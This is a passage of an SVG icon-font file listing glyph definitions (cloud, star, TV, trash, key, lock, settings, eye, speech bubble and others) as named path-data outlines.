<glyph unicode="&#xe911;" glyph-name="cloud3" d="M829.248 539.424c-13.984 146.016-135.552 260.576-285.248 260.576-115.808 0-214.944-68.736-260.672-167.36-13.76 4.352-28.096 7.36-43.296 7.36-79.52 0-144-64.512-144-144 0-15.808 3.168-30.752 7.872-44.928-61.856-36.064-103.872-102.24-103.872-179.008 0-114.88 93.12-208 208-208v-0.064l575.968 0.064c132.576 0 240 107.424 240 240 0 116.992-83.872 214.176-194.752 235.36zM784 128.064v-0.064h-575.968c-79.392 0.064-144 64.64-144 144.064 0 51.2 26.976 97.44 72.128 123.744 43.872 25.184 46.88 30.176 28.48 75.424-3.104 9.312-4.608 17.408-4.608 24.736 0 44.128 35.872 80 80 80 0 0 20.992 1.504 43.296-7.36 36.704-14.624 40.704-0.64 58.048 37.088 36.704 79.136 116.224 130.304 202.624 130.304 115.2 0 210.432-87.136 221.568-202.688 3.936-45.824 3.936-45.824 51.68-56.736 82.752-15.808 142.752-88.384 142.752-172.512 0-97.056-78.944-176-176-176z" />
<glyph unicode="&#xe912;" glyph-name="star" d="M1020.192 558.176c-8.864 25.568-31.616 44.288-59.008 48.352l-266.432 39.616-115.808 240.448c-12.192 25.248-38.272 41.408-66.944 41.408s-54.752-16.16-66.944-41.408l-115.808-240.448-266.464-39.616c-27.36-4.064-50.112-22.784-58.944-48.352-8.8-25.632-2.144-53.856 17.184-73.12l195.264-194.944-45.28-270.432c-4.608-27.232 7.2-54.56 30.336-70.496 12.704-8.736 27.648-13.184 42.592-13.184 12.288 0 24.608 3.008 35.776 8.992l232.288 125.056 232.32-125.056c11.168-5.984 23.488-8.992 35.744-8.992 14.944 0 29.888 4.448 42.624 13.184 23.136 15.936 34.88 43.264 30.304 70.496l-45.312 270.432 195.328 194.944c19.296 19.296 25.92 47.52 17.184 73.12zM754.816 340.384c-16.384-16.32-23.808-39.328-20.064-61.888l45.312-270.432-232.32 124.992c-11.136 6.016-23.424 8.992-35.776 8.992-12.288 0-24.608-3.008-35.744-8.992l-232.32-124.992 45.312 270.432c3.776 22.56-3.648 45.568-20.032 61.888l-195.264 194.944 266.432 39.68c24.352 3.616 45.312 18.848 55.776 40.576l115.872 240.384 115.84-240.416c10.496-21.728 31.424-36.928 55.744-40.576l266.496-39.68-195.264-194.912z" />
<glyph unicode="&#xe913;" glyph-name="tv2" d="M709.44 684.032c-86.624 17.824-174.56 26.848-261.28 26.848s-174.624-9.024-261.28-26.848c-11.2-2.304-20.352-10.432-23.968-21.344-46.144-140.192-46.144-282.336 0-422.528 3.584-10.88 12.736-19.008 23.968-21.312 86.656-17.792 174.56-26.848 261.28-26.848 86.688 0 174.656 9.056 261.28 26.88 11.264 2.304 20.384 10.432 24 21.312 46.112 140.192 46.112 282.336 0 422.528-3.616 10.88-12.768 19.008-24 21.312zM703.008 250.176c-169.888-34.88-339.808-34.88-509.664 0-44.192 134.176-44.192 268.32 0 402.528 169.888 34.912 339.808 34.912 509.664 0 44.192-134.176 44.192-268.32 0-402.528zM987.328 757.76c-6.176 26.048-28 45.504-54.56 48.704-139.52 16.96-281.024 25.536-420.608 25.536-139.552 0-281.056-8.576-420.576-25.504-26.56-3.232-48.352-22.656-54.528-48.736-48.928-205.536-48.928-413.952 0-619.52 6.176-26.048 27.968-45.504 54.528-48.672 67.232-8.192 134.912-14.176 202.592-18.432-3.648-2.336-6.016-4.704-6.016-7.136 0-17.696 100.288-32 224-32s224 14.304 224 32c0 2.432-2.368 4.8-6.016 7.136 67.68 4.256 135.36 10.24 202.56 18.432 26.56 3.2 48.384 22.624 54.56 48.672 48.992 205.568 48.992 413.984 0.064 619.52zM925.056 153.056c-275.264-33.376-550.528-33.376-825.76 0-46.816 196.64-46.816 393.28 0 589.888 275.264 33.408 550.528 33.408 825.76 0 46.816-196.608 46.816-393.248 0-589.888zM848.192 576c26.496 0 48 21.504 48 48s-21.504 48-48 48-48-21.504-48-48 21.504-48 48-48zM848.192 640c8.8 0 16-7.2 16-16s-7.2-16-16-16-16 7.2-16 16 7.168 16 16 16zM880.192 256c8.8 0 16-7.136 16-16 0-8.8-7.2-16-16-16h-96c-8.864 0-16 7.2-16 16 0 8.864 7.136 16 16 16h96zM912.192 352c8.8 0 16-7.136 16-16 0-8.8-7.2-16-16-16h-96c-8.864 0-16 7.2-16 16 0 8.864 7.136 16 16 16h96zM912.192 448c8.8 0 16-7.168 16-16s-7.2-16-16-16h-96c-8.864 0-16 7.168-16 16s7.136 16 16 16h96zM432.16 582.272c8.832 0.352 16-6.528 16-15.36s-7.2-16.256-16-16.576l-119.968-8.224c-8.736-0.896-16.864-8.768-18.048-17.472l-5.344-60.64c-0.352-8.8-7.84-16-16.576-16-8.768 0-15.584 7.2-15.136 16l9.76 89.152c1.472 8.704 9.824 16.64 18.56 17.632l146.752 11.488z" />
<glyph unicode="&#xe914;" glyph-name="sound" d="M863.936 511.904c0 158.784-129.184 288-288 287.968v0.128c-8.8 0.032-15.936 7.2-15.936 16 0 8.832 7.136 16 16 16 0.32 0 0.576-0.128 0.8-0.192 176.256-0.416 318.944-143.264 319.136-319.552 0-0.096 0.064-0.16 0.064-0.256 0-8.832-7.2-15.968-16-15.968s-15.936 7.104-16 15.872h-0.064zM291.872 931.904c-18.336 18.368-42.912 28.096-67.904 28.096-12.352 0-24.8-2.368-36.672-7.296-35.904-14.848-59.296-49.856-59.296-88.704l-0.032-440.224-99.84-99.904c-37.504-37.44-37.504-98.24 0-135.744l224-224c18.752-18.752 43.296-28.128 67.872-28.128s49.12 9.376 67.872 28.128l99.872 99.872h440.192c38.88 0 73.888 23.36 88.672 59.264 14.88 35.872 6.688 77.184-20.8 104.64l-703.936 704zM442.496 109.248l-99.872-99.872c-8.16-8.128-17.696-9.376-22.624-9.376s-14.464 1.248-22.624 9.376l-224 224c-8.16 8.192-9.376 17.696-9.376 22.624s1.216 14.496 9.376 22.624l99.84 99.872c0.288 0.32 0.384 0.672 0.672 0.992l269.6-269.632c-0.288-0.224-0.704-0.288-0.992-0.608zM487.744 128c-4.96 0-9.568-1.76-14.304-2.816l-284.32 284.32c1.088 4.736 2.848 9.344 2.848 14.272l0.032 385.472 681.184-681.248h-385.44zM957.504 147.744c-4.928-12-16.576-19.744-29.568-19.744h-9.504l-726.432 726.496v9.504c0 12.992 7.744 24.608 19.744 29.568 3.936 1.632 8.032 2.432 12.224 2.432 8.576 0 16.608-3.328 22.624-9.344l703.968-704.032c9.184-9.184 11.936-22.88 6.944-34.88zM575.936 896c-17.632 0.032-31.936 14.368-31.936 32 0 17.696 14.304 32 32 32 0.32 0 0.576-0.128 0.8-0.16 246.944-0.448 446.944-200.608 447.136-447.584 0-0.096 0.064-0.16 0.064-0.256 0-17.696-14.304-32-32-32-17.632 0-31.936 14.272-32 31.872h-0.064c0 211.744-172.256 384-384 384v0.128z" />
<glyph unicode="&#xe915;" glyph-name="video2" d="M960 768h-28.384c-16.8 0-32.928-6.624-44.928-18.432l-86.688-85.504v39.936c0 53.024-43.008 96-96 96h-608c-52.928 0-96-43.040-96-96v-512c0-52.992 42.976-96 96-96h608c52.992 0 96 43.008 96 96v39.072l86.688-85.504c12-11.808 28.128-18.432 44.928-18.432h28.384c35.328 0 64 28.64 64 64v512.864c0 35.36-28.672 64-64 64zM96 160c-17.664 0-32 14.368-32 32v512c0 17.696 14.304 32 32 32h608c17.632 0 32-14.336 32-32v-512c0-17.632-14.368-32-32-32h-608zM960 191.136h-32l-128 128v0.864l-32 32v192l160 160h32v-512.864z" />
<glyph unicode="&#xe916;" glyph-name="trash" d="M959.36 741.792c-3.072 50.24-44.384 90.112-95.36 90.112h-96v32.064c0 53.024-43.008 96-96 96h-320c-53.024 0-96-42.976-96-96v-32.032h-96c-51.040 0-92.32-39.872-95.392-90.112h-0.608v-69.856c0-35.328 28.672-64 64-64v0-544c0-70.688 57.312-128 128-128h512c70.688 0 128 57.312 128 128v544c35.328 0 64 28.672 64 64v69.824h-0.64zM320 863.936c0 17.696 14.304 32 32 32h320c17.696 0 32-14.304 32-32v-32h-384v32zM832 63.936c0-35.264-28.736-64-64-64h-512c-35.296 0-64 28.736-64 64v544h640v-544zM896 703.968v-32h-768v63.968c0 17.696 14.304 32 32 32h704c17.696 0 32-14.304 32-32v-31.968zM288 63.808h64c17.696 0 32 14.304 32 32v416c0 17.696-14.304 32-32 32h-64c-17.696 0-32-14.304-32-32v-416c0-17.696 14.304-32 32-32zM288 511.84h64v-416h-64v416zM480 63.808h64c17.696 0 32 14.304 32 32v416c0 17.696-14.304 32-32 32h-64c-17.696 0-32-14.304-32-32v-416c0-17.696 14.304-32 32-32zM480 511.84h64v-416h-64v416zM672 63.808h64c17.696 0 32 14.304 32 32v416c0 17.696-14.304 32-32 32h-64c-17.696 0-32-14.304-32-32v-416c0-17.696 14.304-32 32-32zM672 511.84h64v-416h-64v416z" />
<glyph unicode="&#xe917;" glyph-name="user2" d="M995.52 53.248c-6.432 4.256-123.136 80.8-296.736 118.368 63.68 80.672 104.576 189.184 121.952 261.408 24.128 100.096 14.752 295.936-81.376 417.984-56.192 71.328-134.816 108.992-227.36 108.992s-171.168-37.696-227.328-108.992c-96.128-122.016-105.472-317.856-81.376-417.952 17.376-72.224 58.24-180.736 121.952-261.408-173.6-37.568-290.304-114.112-296.704-118.368-23.456-15.616-33.952-44.8-25.76-71.744 8.128-27.040 33.056-45.536 61.216-45.536h896c28.192 0 53.056 18.496 61.248 45.504 8.224 26.944-2.272 56.128-25.728 71.744zM648.544 211.264l-10.432-13.248c-76.32-87.68-175.84-87.68-252.128 0l-10.464 13.248c-89.12 112.928-133.344 262.304-114.304 404.8 17.44 136.928 95.904 279.936 250.784 279.936s233.376-143.040 250.816-279.968c18.976-142.56-25.088-291.776-114.272-404.768zM64 0c4.416 2.944 112.832 74.048 274.752 109.056l79.488 17.184c28.384-18.624 59.52-30.24 93.76-30.24 34.272 0 65.376 11.616 93.76 30.24l79.488-17.184c160.64-34.752 268.672-105.056 274.752-109.056h-896z" />
<glyph unicode="&#xe918;" glyph-name="key4" d="M704.128 960c-176.736 0-320-143.296-320-320 0-41.12 8.608-80.032 22.816-116.128l-388.768-388.736c-11.232-11.264-18.176-21.952-18.176-39.136v-96c0-34.24 29.728-64 64-64h96c17.152 0 28 6.88 39.232 18.048l45.92 45.952h74.976c35.328 0 64 28.672 64 64v64h64c35.328 0 64 28.672 64 64v75.008l75.808 75.872c36.128-14.24 75.008-22.88 116.192-22.88 176.672 0 320 143.296 320 320s-143.328 320-320 320zM704.128 384c-47.36 0-91.264 13.76-129.312 36.224l-11.008-10.976-96.96-96.992c-12-12-18.752-28.256-18.752-45.248v-75.008h-64c-35.328 0-64-28.64-64-64v-64h-74.944c-16.96 0-33.248-6.752-45.248-18.752l-45.376-45.376-90.432 0.128-0.096 91.2 373.28 372.608c0 0 0-0.032 0.032-0.064l47.008 47.008c-22.464 38.048-36.224 81.92-36.224 129.28 0 141.376 114.656 256 256 256s256-114.624 256-256-114.592-256.032-255.968-256.032zM890.24 696.352c-35.872 49.984-79.552 93.6-129.76 129.728-8.16 5.92-18.72 7.392-28.224 4.064-44.448-15.648-74.88-46.048-90.432-90.496-1.184-3.328-1.76-6.784-1.76-10.208 0-6.368 1.984-12.672 5.824-18.016 36-50.048 79.616-93.696 129.696-129.696 8.192-5.888 18.688-7.392 28.192-4.096 44.512 15.552 74.944 46.016 90.56 90.496 1.184 3.328 1.76 6.784 1.76 10.208-0.032 6.368-2.048 12.672-5.856 18.016zM794.24 607.68c-47.296 34.016-88.48 75.2-122.24 121.376 12.384 35.296 35.552 58.464 69.824 71.072 47.328-34.080 88.448-75.168 122.112-121.952-12.512-35.040-35.616-58.080-69.696-70.496z" />
<glyph unicode="&#xe919;" glyph-name="search3" d="M640 959.84c-212.064 0-384-171.936-384-384 0-64.832 16.224-125.856 44.64-179.456l-267.008-266.944 0.224-0.192c-20.864-20.512-33.856-48.928-33.856-80.512 0-62.368 50.56-112.928 112.928-112.928 31.52 0 59.968 12.992 80.48 33.888l-0.064 0.064 266.912 266.88c53.632-28.512 114.752-44.8 179.744-44.8 212.064 0 384 171.936 384 384s-171.936 384-384 384zM153.44 9.696c-10.304-10.688-24.576-17.376-40.512-17.376-31.2 0-56.48 25.248-56.48 56.448 0 15.936 6.72 30.176 17.376 40.512l-0.288 0.256 258.112 258.112c22.56-30.432 49.44-57.312 79.808-79.936l-258.016-258.016zM640 255.808c-176.704 0-320 143.328-320 320 0 176.704 143.296 320 320 320 176.672 0 320-143.296 320-320 0-176.672-143.328-320-320-320zM640 799.84c8.8 0 16-7.168 16-16s-7.2-16-16-16c-106.048 0-192-85.984-192-192 0-8.832-7.168-16-16-16s-16 7.168-16 16c0 123.712 100.256 224 224 224z" />
<glyph unicode="&#xe91a;" glyph-name="settings" d="M972.512 554.24l-98.048 19.648c-4.928 14.176-10.752 27.936-17.184 41.248l55.552 83.328c16.928 25.376 13.568 59.2-8 80.736l-61.568 61.568c-12.384 12.384-28.736 18.752-45.312 18.752-12.256 0-24.64-3.52-35.424-10.752l-83.328-55.52c-13.376 6.464-27.136 12.224-41.312 17.152l-19.648 98.080c-5.952 29.952-32.256 51.456-62.752 51.456h-87.040c-30.496 0-56.768-21.536-62.752-51.456l-19.648-98.080c-14.176-4.928-27.936-10.72-41.248-17.152l-83.296 55.52c-10.848 7.232-23.2 10.752-35.488 10.752-16.544 0-32.896-6.368-45.28-18.752l-61.536-61.568c-21.568-21.568-24.928-55.36-8-80.736l55.52-83.328c-6.464-13.344-12.224-27.104-17.152-41.28l-98.112-19.616c-29.92-5.984-51.456-32.256-51.456-62.752v-87.040c0-30.496 21.536-56.8 51.456-62.752l98.080-19.68c4.928-14.176 10.72-27.936 17.152-41.248l-55.488-83.328c-16.928-25.376-13.568-59.2 8-80.736l61.568-61.568c12.384-12.384 28.736-18.752 45.28-18.752 12.288 0 24.672 3.552 35.456 10.752l83.328 55.552c13.344-6.496 27.104-12.256 41.28-17.184l19.616-98.048c5.984-29.952 32.256-51.488 62.752-51.488h87.040c30.496 0 56.8 21.568 62.752 51.488l19.68 98.048c14.176 4.928 27.936 10.752 41.248 17.184l83.328-55.552c10.816-7.2 23.2-10.752 35.424-10.752 16.576 0 32.928 6.368 45.312 18.752l61.568 61.568c21.568 21.568 24.928 55.36 8 80.736l-55.552 83.328c6.496 13.376 12.256 27.136 17.184 41.312l98.048 19.616c29.92 5.92 51.488 32.256 51.488 62.752v87.040c0 30.496-21.568 56.768-51.488 62.752zM861.888 384.8c-22.24-4.448-40.448-20.32-47.872-41.76-4.128-11.808-8.928-23.264-14.304-34.368-9.952-20.448-8.256-44.576 4.32-63.424l55.552-83.328-61.568-61.568-83.328 55.552c-10.688 7.136-23.072 10.752-35.488 10.752-9.504 0-19.072-2.112-27.872-6.368-11.136-5.376-22.56-10.24-34.432-14.368-21.376-7.424-37.248-25.632-41.696-47.872l-19.68-98.112h-87.040l-19.616 98.112c-4.448 22.24-20.32 40.448-41.728 47.872-11.808 4.128-23.296 8.928-34.4 14.304-8.832 4.32-18.368 6.432-27.904 6.432-12.448 0-24.8-3.616-35.488-10.752l-83.328-55.552-61.568 61.568 55.52 83.328c12.576 18.88 14.208 43.008 4.384 63.36-5.376 11.136-10.208 22.56-14.336 34.432-7.424 21.376-25.664 37.248-47.872 41.696l-98.080 19.68-0.064 87.072 98.112 19.616c22.208 4.448 40.448 20.32 47.872 41.728 4.128 11.808 8.896 23.296 14.304 34.4 9.92 20.416 8.256 44.544-4.352 63.392l-55.488 83.328 61.536 61.568 83.328-55.52c10.688-7.136 23.072-10.752 35.488-10.752 9.504 0 19.040 2.112 27.872 6.368 11.104 5.376 22.56 10.208 34.4 14.336 21.408 7.424 37.28 25.664 41.728 47.872l19.648 98.080 87.040 0.032 19.616-98.112c4.448-22.208 20.32-40.448 41.76-47.872 11.808-4.128 23.264-8.896 34.368-14.304 8.864-4.288 18.368-6.4 27.936-6.4 12.448 0 24.8 3.616 35.488 10.752l83.328 55.52 61.568-61.568-55.552-83.328c-12.576-18.88-14.176-42.976-4.384-63.36 5.376-11.104 10.24-22.56 14.368-34.4 7.424-21.408 25.632-37.28 47.872-41.728l98.048-19.648 0.096-87.040-98.112-19.648zM512 671.968c-123.68 0-224-100.32-224-224 0-123.712 100.32-224 224-224s224 100.32 224 224c0 123.68-100.32 224-224 224zM512 251.936c-108.224 0-196 87.808-196 196 0 108.224 87.776 196 196 196 108.192 0 196-87.776 196-196 0-108.192-87.808-196-196-196zM512 575.968c-70.72 0-128-57.28-128-128 0-70.688 57.28-128 128-128 70.688 0 128 57.312 128 128s-57.312 128-128 128zM512 351.936c-52.992 0-96 43.008-96 96s43.008 96 96 96 96-43.008 96-96c0-52.992-43.008-96-96-96z" />
<glyph unicode="&#xe91b;" glyph-name="camera3" d="M512 639.968c-141.408 0-256-114.592-256-256 0-141.376 114.592-256 256-256 141.376 0 256 114.624 256 256s-114.624 256-256 256zM657.76 259.008c-68.992-80.512-190.176-89.824-270.688-20.8-80.544 68.992-89.824 190.208-20.8 270.688 68.96 80.544 190.176 89.824 270.688 20.8 80.48-68.96 89.792-190.208 20.8-270.688zM512 511.968c8.832 0 16-7.168 16-16s-7.168-16-16-16c-53.024 0-95.968-42.976-96-95.968v-0.064c0-8.8-7.168-16-16-16s-16 7.2-16 16v0.064c0.032 70.656 57.312 127.968 128 127.968zM943.744 670.656l-138.688 23.136-43.936 109.888c-14.688 36.64-49.696 60.32-89.12 60.32h-320c-39.424 0-74.432-23.68-89.152-60.352l-43.904-109.856-138.656-23.136c-46.528-7.712-80.288-47.52-80.288-94.656v-480c0-52.928 43.072-96 96-96h832c52.928 0 96 43.072 96 96v480c0 47.136-33.76 86.944-80.256 94.656zM960 96c0-17.696-14.304-32-32-32h-832c-17.696 0-32 14.304-32 32v480c0 15.648 11.328 28.992 26.752 31.552l174.208 29.024 57.312 143.296c4.896 12.128 16.64 20.128 29.728 20.128h320c13.056 0 24.8-7.968 29.696-20.128l57.312-143.296 174.24-29.024c15.424-2.56 26.752-15.904 26.752-31.552v-480z" />
<glyph unicode="&#xe91c;" glyph-name="tag" d="M1004.512 515.744l-160 256c-23.36 37.408-64.384 60.16-108.512 60.16h-608c-70.688 0-128-57.312-128-128v-512c0-70.688 57.312-128 128-128h608c44.128 0 85.12 22.752 108.512 60.192l160 256c25.984 41.44 25.984 94.144 0 135.648zM950.24 414.016l-160-256.064c-11.744-18.816-32.064-30.048-54.24-30.048h-608c-35.296 0-64 28.736-64 64v512c0 35.296 28.704 64 64 64h608c22.176 0 42.496-11.264 54.24-30.048l160-256c12.896-20.64 12.896-47.264 0-67.84zM736 543.904c-53.056 0-96-42.976-96-96s42.944-96 96-96c52.992 0 96 43.008 96 96 0 53.024-43.008 96-96 96zM736 383.872c-35.36 0-64 28.672-64 64s28.64 64 64 64c35.328 0 64-28.672 64-64 0-35.296-28.672-64-64-64z" />
<glyph unicode="&#xe91d;" glyph-name="lock3" d="M800 544v128c0 159.072-128.928 288-288 288s-288-128.928-288-288v-128c-53.024 0-96-42.976-96-96v-224c0-159.072 128.928-288 288-288h192c159.072 0 288 128.928 288 288v224c0 53.056-43.008 96-96 96zM288 672c0 123.712 100.288 224 224 224s224-100.288 224-224v-128h-64v127.936c0 88.384-71.616 160-160 160s-160-71.616-160-160v-127.936h-64v128zM640 672v-128h-256v128c0 70.688 57.312 128 128 128s128-57.312 128-128zM832 352v-128c0-123.488-100.512-224-224-224h-192c-123.488 0-224 100.512-224 224v224c0 17.664 14.336 32 32 32 21.344 0 42.656 0 64 0h448c21.312 0 42.624 0 64 0 17.632 0 32-14.336 32-32v-96zM512 352c35.328 0 64-28.64 64-64 0-19.488-10.496-56.576-21.312-85.824-8.736-23.616-17.664-42.112-42.688-42.112-23.008 0-33.952 18.688-42.656 42.432-10.688 29.184-21.344 66.080-21.344 85.504 0 35.36 28.672 64 64 64z" />
<glyph unicode="&#xe91e;" glyph-name="bulb" d="M512 960c-194.432 0-352-157.568-352-352 0-128.992 118.016-265.696 160.992-385.76 64.096-179.040 56.992-286.24 191.008-286.24 136 0 126.88 106.688 191.008 285.504 43.104 120.32 160.992 258.496 160.992 386.496 0 194.432-157.632 352-352 352zM594.944 90.368l-158.656-19.808c-5.664 16.384-11.744 35.552-19.136 60.576-0.096 0.32-0.224 0.672-0.288 0.992l198.016 24.736c-2.816-9.44-5.824-19.36-8.448-28.256-4.192-14.368-7.936-26.848-11.488-38.24zM407.552 162.944c-5.824 19.264-12.384 39.552-19.68 61.056h248.512c-3.936-11.488-7.872-23.008-11.264-33.888l-217.568-27.168zM512 0c-32.416 0-47.328 3.744-63.904 40l135.616 16.992c-19.648-52.928-33.952-56.992-71.712-56.992zM661.504 288h-298.656c-15.936 34.56-35.072 69.12-53.952 102.944-41.76 74.72-84.896 152-84.896 217.056 0 158.816 129.184 288 288 288s288-129.184 288-288c0-64.576-43.2-142.272-84.992-217.44-18.688-33.696-37.696-68.192-53.504-102.56zM512 800c8.8 0 16-7.168 16-16s-7.168-16-16-16c-88.224 0-160-71.776-160-160 0-8.832-7.168-16-16-16s-16 7.168-16 16c0 105.888 86.112 192 192 192z" />
<glyph unicode="&#xe91f;" glyph-name="pen2" d="M940.64 877.44c-52.64 52.576-121.952 82.56-190.272 82.56-57.632 0-110.688-21.376-149.44-60.064l-155.744-156.928c-0.48-0.448-1.024-0.736-1.504-1.216-0.256-0.256-0.416-0.608-0.672-0.832l0.064-0.064-330.528-333.088c-15.232-15.136-26.272-33.984-32.416-54.56l-75.168-272.256c-0.064-0.736-4.96-22.112-4.96-32.992 0-61.824 50.208-112 112.128-112 12.32 0 36.16 5.888 37.024 6.016l271.296 71.328c20.608 6.112 39.328 17.248 54.56 32.512l488.416 492.256c88.832 88.896 78.816 237.888-22.784 339.328zM512.448 198.56c-2.624 28.864-10.784 57.184-23.008 84.064l302.56 302.528c18.496-58.432 8.992-119.552-31.552-160.128-0.256-0.256-0.576-0.416-0.8-0.672l0.448-0.416-247.296-249.28c0 7.968 0.384 15.776-0.352 23.904zM473.376 311.808c-11.936 19.616-25.504 38.56-42.304 55.328-19.552 19.552-41.984 34.88-65.408 47.744l305.024 305.024c23.936-10.624 46.88-25.76 67.136-46.016 17.312-17.248 30.688-36.576 40.992-56.672l-305.44-305.408zM335.552 430.016c-29.632 11.936-60.672 18.752-91.776 19.168l246.496 248.384c37.728 36.8 92.672 47.392 146.784 33.984l-301.504-301.536zM133.344 4.064c-3.488-0.8-14.336-3.552-21.696-4.064-26.304 0.32-47.648 21.696-47.648 48 0.384 5.376 2.528 14.624 3.264 17.984l33.696 122.048c36.576 0.992 75.936-13.248 106.88-44.256 31.424-31.36 46.208-71.488 44.608-108.512l-119.104-31.2zM283.968 43.616c-0.768 42.944-18.24 87.616-53.504 122.816-33.344 33.376-76.992 52.64-120.512 54.368l31.872 115.424c2.304 7.68 6.88 15.264 12.512 21.888 64.192 45.952 162.912 32.384 231.488-36.256 72.544-72.512 83.744-178.752 27.872-242.176-3.712-1.952-7.456-3.808-11.488-4.992l-118.24-31.072zM918.112 583.296l-53.888-54.304c0 7.232 0.864 14.176 0.192 21.568-5.632 61.92-34.496 121.792-81.376 168.608-52.128 52.16-121.248 82.080-189.696 82.272l52.992 53.44c26.528 26.464 63.552 41.12 104.032 41.12 51.488 0 104.384-23.296 145.056-63.84 38.176-38.112 60.928-85.472 64.192-133.376 3.008-44.704-11.744-85.696-41.504-115.488z" />
<glyph unicode="&#xe920;" glyph-name="diamond" d="M1005.248 650.336l-162.56 162.592c-12 12-28.32 18.752-45.248 18.752h-570.848c-16.96 0-33.248-6.752-45.248-18.752l-162.56-162.592c-12.576-12.544-18.848-29.088-18.784-45.664 0.096-15.040 5.472-30.048 16.192-42.112l447.968-477.056c12.16-13.696 29.568-21.504 47.84-21.504s35.68 7.808 47.808 21.504l448 477.056c10.944 12.32 16.32 27.744 16.192 43.136-0.128 16.192-6.432 32.32-18.752 44.64zM583.008 607.68h-142.048l71.040 59.168 71.008-59.168zM537.024 687.68l87.424 72.896 64.576-64.576-81.024-67.488-70.976 59.168zM416 628.512l-81.024 67.488 64.576 64.576 87.456-72.896-71.008-59.168zM591.68 575.68l-79.68-398.496-79.68 398.496h159.36zM624.32 575.68h156.992l-235.488-392.608 78.496 392.608zM632.928 607.68l78.816 65.632 65.632-65.632h-144.448zM662.624 767.68h112.384l-61.312-51.104-51.072 51.104zM512 708.48l-71.040 59.2h142.016l-70.976-59.2zM310.272 716.576l-61.312 51.104h112.416l-51.104-51.104zM312.256 673.312l78.784-65.632h-144.416l65.632 65.632zM399.68 575.68l78.496-392.608-235.52 392.608h157.024zM406.528 240.384l-314.88 335.296h113.728l201.152-335.296zM818.624 575.68h113.76l-314.944-335.36 201.184 335.36zM822.624 607.68l-86.176 86.176 73.504 61.28 147.424-147.456h-134.752zM213.952 755.2l73.632-61.344-86.208-86.176h-137.184l149.76 147.52z" />
<glyph unicode="&#xe921;" glyph-name="display2" d="M864 800.128l-704-0.128c-17.696 0-32-14.176-32-31.872v-448c0-17.696 14.304-32 32-32h704c17.696 0 32 14.304 32 32v448c0 17.696-14.304 32-32 32zM864 320h-704v448.128h704v-448.128zM928 928h-832c-53.024 0-96-42.944-96-96v-640c0-52.928 42.816-95.808 95.68-95.936h320.32v-38.944l-199.744-25.952c-14.272-3.552-24.256-16.352-24.256-31.040 0-17.696 14.304-32 32-32h576c17.696 0 32 14.304 32 32 0 14.688-9.984 27.488-24.256 31.072l-199.744 25.92v38.944h320.32c52.864 0.128 95.68 43.008 95.68 95.936v640c0 53.056-43.008 96-96 96zM960 192c0-17.632-14.368-32-32-32h-832c-17.664 0-32 14.368-32 32v640c0 17.664 14.336 32 32 32h832c17.632 0 32-14.336 32-32v-640z" />
<glyph unicode="&#xe922;" glyph-name="location3" d="M512.064 392.128c105.888 0 192 86.144 192 192s-86.112 192-192 192c-105.888 0-192-86.112-192-192s86.112-192 192-192zM512.064 744.128c88.256 0 160-71.744 160-160s-71.744-160-160-160c-88.256 0-160 71.744-160 160s71.744 160 160 160zM512 960c-211.776 0-384-170.112-384-384.032 0-224 192.032-453.152 332.032-614.208 0.512-0.64 22.976-25.76 50.752-25.76 0.064 0 2.336 0 2.464 0 27.744 0 50.24 25.12 50.752 25.76 140.064 161.056 332.064 390.176 332.064 614.208 0 213.92-172.256 384.032-384.064 384.032zM515.744 3.744c-0.672-0.64-2.624-2.048-4.32-3.136-0.32 0.864-2.688 2.752-4.128 4.256-117.28 134.944-315.296 362.688-315.296 571.104 0 176.448 143.584 320.032 320 320.032 176.512 0 320.064-143.584 320.064-320.064 0-208.384-198.016-436.128-316.32-572.192z" />
<glyph unicode="&#xe923;" glyph-name="eye2" d="M1022.88 455.168c-0.32 1.344-0.128 2.784-0.64 4.096-0.192 0.544-0.672 0.832-0.864 1.344-0.32 0.768-0.256 1.632-0.672 2.368-92.8 177.632-294.816 304.896-507.936 304.896-213.152 0-415.136-127.072-508-304.672-0.416-0.736-0.352-1.6-0.672-2.368-0.224-0.512-0.672-0.8-0.864-1.344-0.512-1.312-0.32-2.752-0.64-4.096-0.576-2.4-1.12-4.704-1.12-7.168s0.576-4.736 1.12-7.168c0.32-1.344 0.128-2.784 0.64-4.096 0.192-0.544 0.672-0.832 0.864-1.344 0.32-0.768 0.256-1.632 0.672-2.368 92.832-177.632 294.848-304.896 508-304.896 213.12 0 415.136 127.072 507.936 304.672 0.448 0.736 0.384 1.6 0.672 2.368 0.192 0.512 0.672 0.8 0.864 1.344 0.512 1.312 0.32 2.752 0.64 4.096 0.544 2.432 1.12 4.736 1.12 7.168s-0.576 4.768-1.12 7.168zM512.736 192.384c-179.68 0-355.584 102.112-443.232 255.84 88.128 153.92 263.776 255.68 443.232 255.68 179.616 0 355.552-102.144 443.2-255.84-88.128-153.952-263.744-255.68-443.2-255.68zM512.736 576.032c8.832 0 15.936-7.136 15.936-16 0-8.8-7.136-15.968-15.936-15.968v-0.032c-52.928 0-95.968-43.040-95.968-95.904 0-8.832-7.168-16-15.968-16-8.832 0-16 7.168-16 16 0 70.56 57.184 127.744 127.744 127.872 0.064 0 0.128 0.032 0.192 0.032zM512 672c-123.744 0-224-100.288-224-224s100.288-224 224-224c123.68 0 224 100.32 224 224 0 123.744-100.32 224-224 224zM512 256c-105.888 0-192 86.112-192 192s86.112 192 192 192c105.888 0 192-86.112 192-192s-86.112-192-192-192z" />
<glyph unicode="&#xe924;" glyph-name="bubble3" d="M512 736c8.832 0 16-7.168 16-16s-7.2-16-16-16c-170.464 0-320-89.728-320-192 0-8.832-7.168-16-16-16s-16 7.168-16 16c0 121.408 161.184 224 352 224zM512 896c-282.784 0-512-171.936-512-384 0-132.064 88.928-248.512 224.256-317.632 0-0.864-0.256-1.44-0.256-2.368 0-57.376-42.848-119.136-61.696-151.552 0.032 0 0.064 0 0.064 0-1.504-3.52-2.368-7.392-2.368-11.456 0-16 12.96-28.992 28.992-28.992 3.008 0 8.288 0.8 8.16 0.448 100 16.384 194.208 108.256 216.096 134.88 31.968-4.704 64.928-7.328 98.752-7.328 282.72 0 512 171.936 512 384s-229.248 384-512 384zM512 192c-29.344 0-59.456 2.24-89.472 6.624-3.104 0.512-6.208 0.672-9.28 0.672-19.008 0-37.216-8.448-49.472-23.36-13.696-16.672-52.672-53.888-98.72-81.248 12.48 28.64 22.24 60.736 22.912 93.824 0.192 2.048 0.288 4.128 0.288 5.888 0 24.064-13.472 46.048-34.88 56.992-118.592 60.544-189.376 157.984-189.376 260.608 0 176.448 200.96 320 448 320 246.976 0 448-143.552 448-320s-200.992-320-448-320z" />
